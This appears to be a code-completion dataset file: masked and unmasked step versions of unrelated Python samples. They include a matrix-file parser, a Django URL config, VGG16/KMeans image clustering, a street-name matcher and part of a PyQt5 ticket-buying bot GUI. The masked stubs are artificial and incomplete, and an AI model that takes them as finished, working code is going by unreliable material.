separados[4]\n elif re.search(pattern_fila, i):\n separado2 = re.findall('\\\\).*', i)\n separados2 = separado2[0].replace(')', ' ')\n separados2 = separados2.replace(';', '')\n separados2 = separados2.replace(' ', '')\n separado = re.findall('\\\\(.*\\\\)', i)\n separados = separado[0].replace('(', '')\n separados = separados.replace(')', '')\n separados = separados.replace(';', '')\n separados = separados.replace(' ', '')\n separados = re.split(',', separados)\n num = 0\n for nom in separados:\n nom = nom.replace(\"'\", '')\n nom = nom.replace(' ', '')\n nodos.append(nodo(num, num_fila, nom, separados2))\n num = num + 1\n num_fila = num_fila + 1\n elif re.search(pattern_nodo, i):\n separado = re.findall('\\\\(.*,.*,.*\\\\).*;', i)\n separados = separado[0].replace('(', '')\n separados = separados.replace(')', ',')\n separados = separados.replace(';', '')\n separados = re.split(',', separados)\n separados[0] = separados[0].replace(' ', '')\n separados[1] = separados[1].replace(' ', '')\n separados[2] = separados[2].replace(\"'\", '')\n separados[2] = separados[2].replace(' ', '')\n separados[3] = separados[3].replace(' ', '')\n nodos.append(nodo(int(separados[0]) - 1, int(separados[1]) -\n 1, separados[2], separados[3]))\n elif re.search(pattern_defecto, i):\n separado = re.findall('\\\\(.*\\\\).*', i)\n separados = separado[0].replace('(', '')\n separados = separados.replace(')', ',')\n separados = separados.replace(';', '')\n separados = re.split(',', separados)\n separados[0] = separados[0].replace(\"'\", '')\n separados[0] = separados[0].replace(' ', '')\n separados[1] = separados[1].replace(' ', '')\n for nod in nodos:\n if nod.nombre == '#':\n nod.nombre = separados[0]\n nombre_def = separados[0]\n if nod.color == '#':\n nod.color = separados[1]\n color_def = separados[1]\n mat = []\n for i in range(0, int(propiedades['columna'])):\n mat.append([])\n for j in range(0, int(propiedades['fila'])):\n mat[i].append(nodo(str(j), str(i), nombre_def, color_def))\n for i in range(0, int(propiedades['columna'])):\n for j in range(0, int(propiedades['fila'])):\n for k in nodos:\n if mat[i][j].fila == str(int(k.fila)) and mat[i][j\n ].columna == str(int(k.columna)):\n mat[i][j] = k\n matriz = propiedades, mat\n graficar_matriz(matriz)\n",
"step-4": "import re\nfrom mapa import graficar_lista, graficar_matriz\n\n\nclass nodo:\n\n def __init__(self, x, y, n, c):\n self.columna = x\n self.fila = y\n self.nombre = n\n self.color = c\n\n\npattern_matriz = '[M|m][A|a][T|t][R|r][I|i][Z|z]\\\\s*\\\\(.*,.*,.*,.*,.*\\\\)\\\\{'\npattern_fila = '[F|f][I|i][L|l][A|a]\\\\s*\\\\(.*\\\\)\\\\s*.*;'\npattern_nodo = '[N|n][O|o][D|d][O|o]\\\\s*\\\\(.*,.*,.*\\\\).*;'\npattern_defecto = '\\\\}\\\\s*[D|d][E|e][F|f][E|e][C|c][T|t][O|o]\\\\s*\\\\(.*\\\\).*'\npropiedades = {'fila': '', 'columna': '', 'nombre_matriz': '', 'forma_nodo':\n '', 'matriz_doble': ''}\nnodos = []\nnombre_def = ''\ncolor_def = ''\n\n\ndef leer_archivo_matriz(path):\n with open(path, 'r', encoding='utf-8') as f:\n lineas = f.readlines()\n num_fila = 0\n estado = ''\n for i in lineas:\n if re.search(pattern_matriz, i):\n separado = re.findall('\\\\(.*,.*,.*,.*,.*\\\\)', i)\n separados = separado[0].replace('(', '')\n separados = separados.replace(')', '')\n separados = re.split(',', separados)\n separados[0] = separados[0].replace(' ', '')\n separados[1] = separados[1].replace(' ', '')\n separados[2] = separados[2].replace(\"'\", '')\n separados[2] = separados[2].replace(' ', '')\n separados[3] = separados[3].replace(' ', '')\n separados[4] = separados[4].replace(' ', '')\n propiedades['fila'] = separados[0]\n propiedades['columna'] = separados[1]\n propiedades['nombre_matriz'] = separados[2]\n propiedades['forma_nodo'] = separados[3]\n propiedades['matriz_doble'] = separados[4]\n elif re.search(pattern_fila, i):\n separado2 = re.findall('\\\\).*', i)\n separados2 = separado2[0].replace(')', ' ')\n separados2 = separados2.replace(';', '')\n separados2 = separados2.replace(' ', '')\n separado = re.findall('\\\\(.*\\\\)', i)\n separados = separado[0].replace('(', '')\n separados = separados.replace(')', '')\n separados = separados.replace(';', '')\n separados = separados.replace(' ', '')\n separados = re.split(',', separados)\n num = 0\n for nom in separados:\n nom = nom.replace(\"'\", '')\n nom = nom.replace(' ', '')\n nodos.append(nodo(num, num_fila, nom, separados2))\n num = num + 1\n num_fila = num_fila + 1\n elif re.search(pattern_nodo, i):\n separado = re.findall('\\\\(.*,.*,.*\\\\).*;', i)\n separados = separado[0].replace('(', '')\n separados = separados.replace(')', ',')\n separados = separados.replace(';', '')\n separados = re.split(',', separados)\n separados[0] = separados[0].replace(' ', '')\n separados[1] = separados[1].replace(' ', '')\n separados[2] = separados[2].replace(\"'\", '')\n separados[2] = separados[2].replace(' ', '')\n separados[3] = separados[3].replace(' ', '')\n nodos.append(nodo(int(separados[0]) - 1, int(separados[1]) -\n 1, separados[2], separados[3]))\n elif re.search(pattern_defecto, i):\n separado = re.findall('\\\\(.*\\\\).*', i)\n separados = separado[0].replace('(', '')\n separados = separados.replace(')', ',')\n separados = separados.replace(';', '')\n separados = re.split(',', separados)\n separados[0] = separados[0].replace(\"'\", '')\n separados[0] = separados[0].replace(' ', '')\n separados[1] = separados[1].replace(' ', '')\n for nod in nodos:\n if nod.nombre == '#':\n nod.nombre = separados[0]\n nombre_def = separados[0]\n if nod.color == '#':\n nod.color = separados[1]\n color_def = separados[1]\n mat = []\n for i in range(0, int(propiedades['columna'])):\n mat.append([])\n for j in range(0, int(propiedades['fila'])):\n mat[i].append(nodo(str(j), str(i), nombre_def, color_def))\n for i in range(0, int(propiedades['columna'])):\n for j in range(0, int(propiedades['fila'])):\n for k in nodos:\n if mat[i][j].fila == str(int(k.fila)) and mat[i][j\n ].columna == str(int(k.columna)):\n mat[i][j] = k\n matriz = propiedades, mat\n graficar_matriz(matriz)\n",
"step-5": "import re\nfrom mapa import graficar_lista, graficar_matriz\n\nclass nodo:\n def __init__(self, x, y, n, c):\n self.columna = x\n self.fila = y\n self.nombre = n\n self.color = c\n\n\npattern_matriz = r\"[M|m][A|a][T|t][R|r][I|i][Z|z]\\s*\\(.*,.*,.*,.*,.*\\)\\{\"\npattern_fila = r\"[F|f][I|i][L|l][A|a]\\s*\\(.*\\)\\s*.*;\"\npattern_nodo = r\"[N|n][O|o][D|d][O|o]\\s*\\(.*,.*,.*\\).*;\"\npattern_defecto = r\"\\}\\s*[D|d][E|e][F|f][E|e][C|c][T|t][O|o]\\s*\\(.*\\).*\"\n\npropiedades = {\n 'fila' : '',\n 'columna' : '',\n 'nombre_matriz' : '',\n 'forma_nodo' : '',\n 'matriz_doble': '',\n}\n\nnodos = []\nnombre_def = \"\"\ncolor_def = \"\"\ndef leer_archivo_matriz(path): \n with open(path, 'r', encoding='utf-8') as f:\n lineas = f.readlines()\n num_fila = 0\n estado = \"\"\n for i in lineas:\n if re.search(pattern_matriz, i):\n separado = re.findall(r\"\\(.*,.*,.*,.*,.*\\)\",i)\n separados = separado[0].replace(\"(\",\"\")\n separados = separados.replace(\")\",\"\")\n separados = re.split(r\",\",separados)\n separados[0] = separados[0].replace(\" \",\"\")\n separados[1] = separados[1].replace(\" \",\"\")\n separados[2] = separados[2].replace(\"'\",\"\")\n separados[2] = separados[2].replace(\" \",\"\")\n separados[3] = separados[3].replace(\" \",\"\")\n separados[4] = separados[4].replace(\" \",\"\")\n\n #Asignar Variables al diccionario\n propiedades['fila'] = separados[0]\n propiedades['columna'] = separados[1]\n propiedades['nombre_matriz'] = separados[2]\n propiedades['forma_nodo'] = separados[3]\n propiedades['matriz_doble'] = separados[4]\n\n elif re.search(pattern_fila, i):\n separado2 = re.findall(r\"\\).*\",i)\n separados2 = separado2[0].replace(\")\",\" \")\n separados2 = separados2.replace(\";\",\"\")\n separados2 = separados2.replace(\" \",\"\")\n\n separado = re.findall(r\"\\(.*\\)\",i)\n separados = separado[0].replace(\"(\",\"\")\n separados = separados.replace(\")\",\"\")\n separados = separados.replace(\";\",\"\")\n separados = separados.replace(\" \",\"\")\n\n separados = re.split(r\",\",separados)\n num = 0\n for nom in separados:\n nom = nom.replace(\"'\", \"\")\n nom = nom.replace(\" \", \"\")\n nodos.append(nodo(num, num_fila, nom, separados2))\n num = num+1 \n\n num_fila = num_fila + 1\n\n elif re.search(pattern_nodo, i):\n separado = re.findall(r\"\\(.*,.*,.*\\).*;\",i)\n separados = separado[0].replace(\"(\",\"\")\n separados = separados.replace(\")\",\",\")\n separados = separados.replace(\";\",\"\")\n\n separados = re.split(r\",\",separados)\n separados[0] = separados[0].replace(\" \",\"\")\n separados[1] = separados[1].replace(\" \",\"\")\n separados[2] = separados[2].replace(\"'\",\"\")\n separados[2] = separados[2].replace(\" \",\"\")\n separados[3] = separados[3].replace(\" \",\"\")\n\n nodos.append(nodo(int(separados[0])-1, int(separados[1])-1, separados[2], separados[3]))\n \n elif re.search(pattern_defecto, i):\n separado = re.findall(r\"\\(.*\\).*\",i)\n separados = separado[0].replace(\"(\",\"\")\n separados = separados.replace(\")\",\",\")\n separados = separados.replace(\";\",\"\")\n\n separados = re.split(r\",\",separados)\n separados[0] = separados[0].replace(\"'\",\"\")\n separados[0] = separados[0].replace(\" \",\"\")\n separados[1] = separados[1].replace(\" \",\"\")\n\n for nod in nodos:\n if nod.nombre == \"#\":\n nod.nombre = separados[0]\n nombre_def = separados[0]\n if nod.color == \"#\":\n nod.color = separados[1]\n color_def = separados[1]\n \n mat = []\n for i in range(0,int(propiedades[\"columna\"])):\n mat.append([])\n for j in range(0, int(propiedades[\"fila\"])):\n mat[i].append(nodo(str(j),str(i),nombre_def, color_def))\n \n for i in range(0,int(propiedades[\"columna\"])):\n for j in range(0, int(propiedades[\"fila\"])):\n for k in nodos:\n if mat[i][j].fila == str(int(k.fila)) and mat[i][j].columna == str(int(k.columna)):\n mat[i][j] = k\n \n # for i in range(0,int(propiedades[\"columna\"])):\n # for j in range(0, int(propiedades[\"fila\"])):\n # print(mat[i][j].fila, mat[i][j].columna,mat[i][j].nombre, mat[i][j].color)\n \n # print(mat)\n\n \n matriz = (propiedades, mat)\n\n # for i in nodos:\n # print(i.nombre, i.color, i.columna, i.fila)\n\n graficar_matriz(matriz)\n \n# leer_archivo_matriz(\"Matriz.lfp\")",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
urlpatterns = [path('product', views.ProductCreateAndList.as_view()), path(
'product/<int:pk>', views.ProductRetrieve.as_view())]
<|reserved_special_token_1|>
from django.urls import path
from . import views
urlpatterns = [path('product', views.ProductCreateAndList.as_view()), path(
'product/<int:pk>', views.ProductRetrieve.as_view())]
<|reserved_special_token_1|>
from django.urls import path
from . import views
urlpatterns = [
path('product', views.ProductCreateAndList.as_view()),
path('product/<int:pk>', views.ProductRetrieve.as_view()),
]
|
flexible
|
{
"blob_id": "d21b89285d4b4c73a08bda746cea31b5a13d1050",
"index": 1967,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns = [path('product', views.ProductCreateAndList.as_view()), path(\n 'product/<int:pk>', views.ProductRetrieve.as_view())]\n",
"step-3": "from django.urls import path\nfrom . import views\nurlpatterns = [path('product', views.ProductCreateAndList.as_view()), path(\n 'product/<int:pk>', views.ProductRetrieve.as_view())]\n",
"step-4": "from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('product', views.ProductCreateAndList.as_view()),\n path('product/<int:pk>', views.ProductRetrieve.as_view()),\n\n]\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import time
import os, os.path
import random
import cv2
import glob
import keras
import matplotlib
import matplotlib.pyplot as plt
from sklearn.model_selection import train_test_split
from sklearn.cluster import KMeans
from sklearn.mixture import GaussianMixture
from sklearn.decomposition import PCA
import pandas as pd
import numpy as np
#DIR = "./Data_example_ph2"
#codes = os.listdir(DIR)
#codes.pop(0)
#codes.sort()
def load_imgs():
category_dir = os.listdir(DIR)
stats=[]
result_imgs = []
result_labels = []
for thing in category_dir:
if thing!='.DS_Store':
label= thing
path = os.path.join(DIR,thing)
file_names = os.listdir(path)
for file in file_names:
result_labels.append(label)
image = cv2.imread(os.path.join(path,file))
image = cv2.resize(image, (224,224))
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
image = np.asarray(image)
image =image/255
result_imgs.append(image)
result_imgs = np.asarray(result_imgs)
result_labels = np.asarray(result_labels)
return result_imgs,result_labels
#X_train,X_lables = load_imgs()
#vgg16_model = keras.applications.vgg16.VGG16(include_top=False, weights="imagenet", input_shape=(224,224,3))
def covnet_transform(covnet_model, raw_images):
# Pass our training data through the network
pred = covnet_model.predict(raw_images)
# Flatten the array
flat = pred.reshape(raw_images.shape[0], -1)
return flat
def create_train_kmeans(data, number_of_clusters):
# n_jobs is set to -1 to use all available CPU cores. This makes a big difference on an 8-core CPU
# especially when the data size gets much bigger. #perfMatters
k = KMeans(n_clusters=number_of_clusters, n_jobs=-1, random_state=728)
# Let's do some timings to see how long it takes to train.
start = time.time()
# Train it up
k.fit(data)
# Stop the timing
end = time.time()
# And see how long that took
print("Training took {} seconds".format(end-start))
return k
#vgg16_output = covnet_transform(vgg16_model, X_train)
#K_vgg16 = create_train_kmeans(vgg16_output)
#k_vgg16_pred = K_vgg16.predict(vgg16_output)
def cluster_label_count(clusters, labels):
count = {}
# Get unique clusters and labels
unique_clusters = list(set(clusters))
unique_labels = list(set(labels))
# Create counter for each cluster/label combination and set it to 0
for cluster in unique_clusters:
count[cluster] = {}
for label in unique_labels:
count[cluster][label] = 0
# Let's count
for i in range(len(clusters)):
count[clusters[i]][labels[i]] +=1
cluster_df = pd.DataFrame(count)
return cluster_df
#vgg16_pred_codes = [codes[x] for x in k_vgg16_pred]
from sklearn.metrics import accuracy_score, f1_score
def print_scores(true, pred):
acc = accuracy_score(true, pred)
f1 = f1_score(true, pred, average="macro")
return "\n\tF1 Score: {0:0.8f} | Accuracy: {0:0.8f}".format(f1,acc)
#print("KMeans VGG16:", print_scores(X_lables, vgg16_pred_codes))
|
normal
|
{
"blob_id": "9c8a213fc8a7397662eebb74d6ee1ad34cb884d9",
"index": 1420,
"step-1": "<mask token>\n\n\ndef create_train_kmeans(data, number_of_clusters):\n k = KMeans(n_clusters=number_of_clusters, n_jobs=-1, random_state=728)\n start = time.time()\n k.fit(data)\n end = time.time()\n print('Training took {} seconds'.format(end - start))\n return k\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef load_imgs():\n category_dir = os.listdir(DIR)\n stats = []\n result_imgs = []\n result_labels = []\n for thing in category_dir:\n if thing != '.DS_Store':\n label = thing\n path = os.path.join(DIR, thing)\n file_names = os.listdir(path)\n for file in file_names:\n result_labels.append(label)\n image = cv2.imread(os.path.join(path, file))\n image = cv2.resize(image, (224, 224))\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n image = np.asarray(image)\n image = image / 255\n result_imgs.append(image)\n result_imgs = np.asarray(result_imgs)\n result_labels = np.asarray(result_labels)\n return result_imgs, result_labels\n\n\n<mask token>\n\n\ndef create_train_kmeans(data, number_of_clusters):\n k = KMeans(n_clusters=number_of_clusters, n_jobs=-1, random_state=728)\n start = time.time()\n k.fit(data)\n end = time.time()\n print('Training took {} seconds'.format(end - start))\n return k\n\n\n<mask token>\n\n\ndef print_scores(true, pred):\n acc = accuracy_score(true, pred)\n f1 = f1_score(true, pred, average='macro')\n return '\\n\\tF1 Score: {0:0.8f} | Accuracy: {0:0.8f}'.format(f1, acc)\n",
"step-3": "<mask token>\n\n\ndef load_imgs():\n category_dir = os.listdir(DIR)\n stats = []\n result_imgs = []\n result_labels = []\n for thing in category_dir:\n if thing != '.DS_Store':\n label = thing\n path = os.path.join(DIR, thing)\n file_names = os.listdir(path)\n for file in file_names:\n result_labels.append(label)\n image = cv2.imread(os.path.join(path, file))\n image = cv2.resize(image, (224, 224))\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n image = np.asarray(image)\n image = image / 255\n result_imgs.append(image)\n result_imgs = np.asarray(result_imgs)\n result_labels = np.asarray(result_labels)\n return result_imgs, result_labels\n\n\n<mask token>\n\n\ndef create_train_kmeans(data, number_of_clusters):\n k = KMeans(n_clusters=number_of_clusters, n_jobs=-1, random_state=728)\n start = time.time()\n k.fit(data)\n end = time.time()\n print('Training took {} seconds'.format(end - start))\n return k\n\n\ndef cluster_label_count(clusters, labels):\n count = {}\n unique_clusters = list(set(clusters))\n unique_labels = list(set(labels))\n for cluster in unique_clusters:\n count[cluster] = {}\n for label in unique_labels:\n count[cluster][label] = 0\n for i in range(len(clusters)):\n count[clusters[i]][labels[i]] += 1\n cluster_df = pd.DataFrame(count)\n return cluster_df\n\n\n<mask token>\n\n\ndef print_scores(true, pred):\n acc = accuracy_score(true, pred)\n f1 = f1_score(true, pred, average='macro')\n return '\\n\\tF1 Score: {0:0.8f} | Accuracy: {0:0.8f}'.format(f1, acc)\n",
"step-4": "import time\nimport os, os.path\nimport random\nimport cv2\nimport glob\nimport keras\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.cluster import KMeans\nfrom sklearn.mixture import GaussianMixture\nfrom sklearn.decomposition import PCA\nimport pandas as pd\nimport numpy as np\n\n\ndef load_imgs():\n category_dir = os.listdir(DIR)\n stats = []\n result_imgs = []\n result_labels = []\n for thing in category_dir:\n if thing != '.DS_Store':\n label = thing\n path = os.path.join(DIR, thing)\n file_names = os.listdir(path)\n for file in file_names:\n result_labels.append(label)\n image = cv2.imread(os.path.join(path, file))\n image = cv2.resize(image, (224, 224))\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n image = np.asarray(image)\n image = image / 255\n result_imgs.append(image)\n result_imgs = np.asarray(result_imgs)\n result_labels = np.asarray(result_labels)\n return result_imgs, result_labels\n\n\ndef covnet_transform(covnet_model, raw_images):\n pred = covnet_model.predict(raw_images)\n flat = pred.reshape(raw_images.shape[0], -1)\n return flat\n\n\ndef create_train_kmeans(data, number_of_clusters):\n k = KMeans(n_clusters=number_of_clusters, n_jobs=-1, random_state=728)\n start = time.time()\n k.fit(data)\n end = time.time()\n print('Training took {} seconds'.format(end - start))\n return k\n\n\ndef cluster_label_count(clusters, labels):\n count = {}\n unique_clusters = list(set(clusters))\n unique_labels = list(set(labels))\n for cluster in unique_clusters:\n count[cluster] = {}\n for label in unique_labels:\n count[cluster][label] = 0\n for i in range(len(clusters)):\n count[clusters[i]][labels[i]] += 1\n cluster_df = pd.DataFrame(count)\n return cluster_df\n\n\nfrom sklearn.metrics import accuracy_score, f1_score\n\n\ndef print_scores(true, pred):\n acc = accuracy_score(true, pred)\n f1 = f1_score(true, pred, average='macro')\n return '\\n\\tF1 Score: {0:0.8f} | Accuracy: {0:0.8f}'.format(f1, acc)\n",
"step-5": "import time\nimport os, os.path\nimport random\nimport cv2\nimport glob\nimport keras\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.cluster import KMeans\nfrom sklearn.mixture import GaussianMixture\nfrom sklearn.decomposition import PCA\n\n\nimport pandas as pd\nimport numpy as np\n\n\n#DIR = \"./Data_example_ph2\"\n#codes = os.listdir(DIR)\n#codes.pop(0)\n#codes.sort()\n\ndef load_imgs():\n category_dir = os.listdir(DIR)\n stats=[]\n result_imgs = []\n result_labels = []\n for thing in category_dir:\n if thing!='.DS_Store':\n label= thing\n path = os.path.join(DIR,thing)\n file_names = os.listdir(path)\n for file in file_names:\n result_labels.append(label)\n image = cv2.imread(os.path.join(path,file))\n image = cv2.resize(image, (224,224))\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n image = np.asarray(image)\n image =image/255\n result_imgs.append(image)\n result_imgs = np.asarray(result_imgs)\n result_labels = np.asarray(result_labels)\n return result_imgs,result_labels\n\n#X_train,X_lables = load_imgs()\n\n#vgg16_model = keras.applications.vgg16.VGG16(include_top=False, weights=\"imagenet\", input_shape=(224,224,3))\n\n\ndef covnet_transform(covnet_model, raw_images):\n\n # Pass our training data through the network\n pred = covnet_model.predict(raw_images)\n\n # Flatten the array\n flat = pred.reshape(raw_images.shape[0], -1)\n \n return flat\n\ndef create_train_kmeans(data, number_of_clusters):\n # n_jobs is set to -1 to use all available CPU cores. This makes a big difference on an 8-core CPU\n # especially when the data size gets much bigger. #perfMatters\n \n k = KMeans(n_clusters=number_of_clusters, n_jobs=-1, random_state=728)\n # Let's do some timings to see how long it takes to train.\n start = time.time()\n\n # Train it up\n k.fit(data)\n\n # Stop the timing \n end = time.time()\n\n # And see how long that took\n print(\"Training took {} seconds\".format(end-start))\n \n return k\n\n#vgg16_output = covnet_transform(vgg16_model, X_train)\n\n#K_vgg16 = create_train_kmeans(vgg16_output)\n#k_vgg16_pred = K_vgg16.predict(vgg16_output)\n\ndef cluster_label_count(clusters, labels):\n \n count = {}\n \n # Get unique clusters and labels\n unique_clusters = list(set(clusters))\n unique_labels = list(set(labels))\n \n # Create counter for each cluster/label combination and set it to 0\n for cluster in unique_clusters:\n count[cluster] = {}\n \n for label in unique_labels:\n count[cluster][label] = 0\n \n # Let's count\n for i in range(len(clusters)):\n count[clusters[i]][labels[i]] +=1\n \n cluster_df = pd.DataFrame(count)\n \n return cluster_df\n\n\n#vgg16_pred_codes = [codes[x] for x in k_vgg16_pred]\n\nfrom sklearn.metrics import accuracy_score, f1_score\n\ndef print_scores(true, pred):\n acc = accuracy_score(true, pred)\n f1 = f1_score(true, pred, average=\"macro\")\n return \"\\n\\tF1 Score: {0:0.8f} | Accuracy: {0:0.8f}\".format(f1,acc)\n\n#print(\"KMeans VGG16:\", print_scores(X_lables, vgg16_pred_codes))\n\n\n\n",
"step-ids": [
1,
3,
4,
6,
7
]
}
|
[
1,
3,
4,
6,
7
] |
from difflib import SequenceMatcher
import csv
naam = "straat"
def similar(a, b):
return SequenceMatcher(None, a, b).ratio()
f = open("straten.txt", "r")
f.readline()
names = f.readlines()
for name in names:
if similar(name[:-1].lower(),naam.lower()) > 0.7:
sim = similar(name[:-1].lower(),naam.lower())
print("gevonden: " + name[:-1] + " ---- " + naam + " ---- " + str(sim))
# with open('straatnamen.csv') as csvfile:
# reader = csv.DictReader(csvfile)
# for row in reader:
# print(row['straatnaam'])
|
normal
|
{
"blob_id": "2f1193e3ab5e0527ab5f89141613eddb18b5f61d",
"index": 2787,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef similar(a, b):\n return SequenceMatcher(None, a, b).ratio()\n\n\n<mask token>\nf.readline()\n<mask token>\nfor name in names:\n if similar(name[:-1].lower(), naam.lower()) > 0.7:\n sim = similar(name[:-1].lower(), naam.lower())\n print('gevonden: ' + name[:-1] + ' ---- ' + naam + ' ---- ' + str(sim))\n",
"step-3": "<mask token>\nnaam = 'straat'\n\n\ndef similar(a, b):\n return SequenceMatcher(None, a, b).ratio()\n\n\nf = open('straten.txt', 'r')\nf.readline()\nnames = f.readlines()\nfor name in names:\n if similar(name[:-1].lower(), naam.lower()) > 0.7:\n sim = similar(name[:-1].lower(), naam.lower())\n print('gevonden: ' + name[:-1] + ' ---- ' + naam + ' ---- ' + str(sim))\n",
"step-4": "from difflib import SequenceMatcher\nimport csv\nnaam = 'straat'\n\n\ndef similar(a, b):\n return SequenceMatcher(None, a, b).ratio()\n\n\nf = open('straten.txt', 'r')\nf.readline()\nnames = f.readlines()\nfor name in names:\n if similar(name[:-1].lower(), naam.lower()) > 0.7:\n sim = similar(name[:-1].lower(), naam.lower())\n print('gevonden: ' + name[:-1] + ' ---- ' + naam + ' ---- ' + str(sim))\n",
"step-5": "from difflib import SequenceMatcher\nimport csv\nnaam = \"straat\"\n\ndef similar(a, b):\n return SequenceMatcher(None, a, b).ratio()\n\nf = open(\"straten.txt\", \"r\")\nf.readline()\nnames = f.readlines()\n\nfor name in names:\n if similar(name[:-1].lower(),naam.lower()) > 0.7:\n sim = similar(name[:-1].lower(),naam.lower())\n print(\"gevonden: \" + name[:-1] + \" ---- \" + naam + \" ---- \" + str(sim))\n\n\n\n\n# with open('straatnamen.csv') as csvfile:\n# reader = csv.DictReader(csvfile)\n# for row in reader:\n# print(row['straatnaam'])\n\n\n\n",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
import ctypes
import win32con
import request_spider
from selenium_tickets_spider import *
from threading import Thread
from PyQt5.QtWidgets import *
from PyQt5 import QtCore, QtWidgets
from PyQt5.QtCore import Qt, QThread, pyqtSignal
import sys, time, re
import datetime
SESSION_DATA = False
SHOW_S_P = False
class Worker(QThread):
valueChanged = pyqtSignal(int) # 值变化信号
handle = -1
def run(self):
global SESSION_DATA,EXIT_COND
try:
self.handle = ctypes.windll.kernel32.OpenThread( # @UndefinedVariable
win32con.PROCESS_ALL_ACCESS, False, int(QThread.currentThreadId()))
except Exception as e:
print('get thread handle failed', e)
# print('thread id', int(QThread.currentThreadId()))
# 循环发送信号
while True:
if SESSION_DATA:
self.valueChanged.emit(1024)
SESSION_DATA = False
time.sleep(0.1)
def exit_thread(self):
os._exit(122)
class Ui_MainWindow(QMainWindow):
threads = []
keywordJudge = ''
def __init__(self):
super(Ui_MainWindow, self).__init__()
# self.ex = Example()
self.buy_succeed_count = 0
for func in [self.output_buy_record, self.output_login_status,self.output_register_record]:
thr = Thread(target=func)
thr.setDaemon(True)
thr.start()
# 子线程
self._thread = Worker(self)
self._thread.finished.connect(self._thread.deleteLater)
self._thread.valueChanged.connect(ex.create_c)
self._thread.start()
def setupUi(self, MainWindow):
# MainWindow.setStyleSheet("#MainWindow{background-color: yellow}")
MainWindow.setObjectName("MainWindow")
MainWindow.resize(640, 478)
# MainWindow.setMinimumSize(640, 478)
# MainWindow.setMaximumSize(640, 478)
# 取消最大化
MainWindow.setWindowFlags(QtCore.Qt.WindowMinimizeButtonHint)
# 固定窗口大小
MainWindow.setFixedSize(self.width(), self.height())
# MainWindow.setWindowFlags(QtCore.Qt.WindowMinimizeButtonHint)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.tabWidget = QtWidgets.QTabWidget(self.centralwidget)
self.tabWidget.setGeometry(QtCore.QRect(0, 0, 631, 461))
self.tabWidget.setObjectName("tabWidget")
self.tab = QtWidgets.QWidget()
self.tab.setObjectName("tab")
# 登录按钮
self.pushButton = QtWidgets.QPushButton(self.tab)
self.pushButton.setGeometry(QtCore.QRect(200, 110, 120, 30))
self.pushButton.setObjectName("pushButton")
# 登陆个数输入框
self.lineEdit_tab = QtWidgets.QLineEdit(self.tab)
self.lineEdit_tab.setGeometry(QtCore.QRect(318, 111, 120, 28))
self.lineEdit_tab.setPlaceholderText(" 请输入登陆个数")
# 登录日志输出
self.label_0 = QtWidgets.QLabel(self.tab)
self.label_0.setGeometry(QtCore.QRect(30, 180, 54, 12))
self.label_0.setObjectName("label_0")
# 注册日志
self.textBrowser_2 = QtWidgets.QTextBrowser(self.tab)
self.textBrowser_2.setGeometry(QtCore.QRect(30, 200, 561, 221))
self.textBrowser_2.setObjectName("textBrowser_2")
# 登录页面
self.tabWidget.addTab(self.tab, "")
self.tab_2 = QtWidgets.QWidget()
self.tab_2.setObjectName("tab_2")
self.tabWidget.addTab(self.tab, "")
self.tab_3 = QtWidgets.QWidget()
self.tab_3.setObjectName("tab_3")
self.lineEdit = QtWidgets.QLineEdit(self.tab_2)
self.lineEdit.setGeometry(QtCore.QRect(90, 30, 171, 31))
self.lineEdit.setObjectName("lineEdit")
# 查询商品名称
self.pushButton_2 = QtWidgets.QPushButton(self.tab_2)
self.pushButton_2.setGeometry(QtCore.QRect(30, 30, 58, 32))
self.pushButton_2.setObjectName("pushButton_2")
self.pushButton_2.clicked.connect(self.search_1)
self.label = QtWidgets.QLabel(self.tab_2)
self.label.setGeometry(QtCore.QRect(30, 80, 54, 12))
self.label.setObjectName("label")
self.label_2 = QtWidgets.QLabel(self.tab_2)
self.label_2.setGeometry(QtCore.QRect(30, 130, 54, 12))
self.label_2.setObjectName("label_2")
self.comboBox = QtWidgets.QComboBox(self.tab_2)
self.comboBox.setGeometry(QtCore.QRect(90, 120, 191, 31))
self.comboBox.setObjectName("comboBox")
# self.comboBox.currentText()
self.comboBox_2 = QtWidgets.QComboBox(self.tab_2)
self.comboBox_2.setGeometry(QtCore.QRect(90, 70, 459, 31))
self.comboBox_2.setObjectName("comboBox_2")
# 选择数量
self.label_3 = QtWidgets.QLabel(self.tab_2)
self.label_3.setGeometry(QtCore.QRect(300, 40, 70, 12))
self.label_3.setObjectName("label_3")
# 数量输入框
self.lineEdit_1 = QtWidgets.QLineEdit(self.tab_2)
self.lineEdit_1.setGeometry(QtCore.QRect(375, 32, 51, 27))
self.lineEdit_1.setObjectName("lineEdit_1")
# 购买成功数量
self.label_6 = QtWidgets.QLabel(self.tab_2)
self.label_6.setGeometry(QtCore.QRect(450, 40, 54, 12))
self.label_6.setObjectName("label_6")
self.label_7 = QtWidgets.QLabel(self.tab_2)
self.label_7.setGeometry(QtCore.QRect(500, 40, 54, 12))
self.label_7.setObjectName("label_7")
self.label_7.setStyleSheet("font-size:16px;color:red") # 设置字体颜色
self.label_8 = QtWidgets.QLabel(self.tab_2)
self.label_8.setGeometry(QtCore.QRect(300, 130, 100, 12))
self.label_8.setObjectName("label_8")
self.lineEdit_8 = QtWidgets.QLineEdit(self.tab_2)
self.lineEdit_8.setGeometry(QtCore.QRect(415, 122, 51, 27))
self.lineEdit_8.setObjectName("lineEdit_8")
self.lineEdit_8.setText('4')
# 购买按钮 当所有条件选择完之后点击
self.pushButton_3 = QtWidgets.QPushButton(self.tab_2)
